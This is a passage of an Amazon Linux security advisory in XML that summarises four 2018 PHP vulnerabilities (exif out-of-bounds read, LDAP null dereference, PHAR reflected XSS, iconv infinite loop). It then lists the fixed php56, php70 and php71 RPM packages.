An issue was discovered in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. exif_read_data in ext/exif/exif.c has an out-of-bounds read for crafted JPEG data because exif_iif_add_value mishandles the case of a MakerNote that lacks a final &#039;\0&#039; character.
1573797:
CVE-2018-10549 php: Out-of-bounds read in ext/exif/exif.c:exif_read_data() when reading crafted JPEG data
CVE-2018-10548:
An issue was discovered in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. ext/ldap/ldap.c allows remote LDAP servers to cause a denial of service (NULL pointer dereference and application crash) because of mishandling of the ldap_get_dn return value.
1573805:
CVE-2018-10548 php: Null pointer dereference due to mishandling of ldap_get_dn return value allows denial-of-service by malicious LDAP server or man-in-the-middle attacker
CVE-2018-10547:
An issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.
1573814:
CVE-2018-10547 php: Reflected XSS vulnerability on PHAR 403 and 404 error pages
CVE-2018-10546:
An issue was discovered in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. An infinite loop exists in ext/iconv/iconv.c because the iconv stream filter does not reject invalid multibyte sequences.
1573802:
CVE-2018-10546 php: Infinite loop in ext/iconv/iconv.c when using stream filter with convert.iconv on invalid sequence leads to denial-of-service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10546" title="" id="CVE-2018-10546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10547" title="" id="CVE-2018-10547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10548" title="" id="CVE-2018-10548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10549" title="" id="CVE-2018-10549" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-opcache" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package 
name="php56-gd" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.36" release="1.138.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-snmp-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package 
name="php56-process" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.36" release="1.138.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-gd-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.36" 
release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-json" 
version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.17" release="1.32.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-recode-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" 
version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.17-1.32.amzn1.i686.rpm</filename></package><package 
name="php71-opcache" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.17-1.32.amzn1.i686.rpm</filename></package><package 
name="php71-snmp" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.17-1.32.amzn1.i686.rpm</filename></package><package 
name="php71-soap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.30" release="1.29.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-common-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.30" 
release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package 
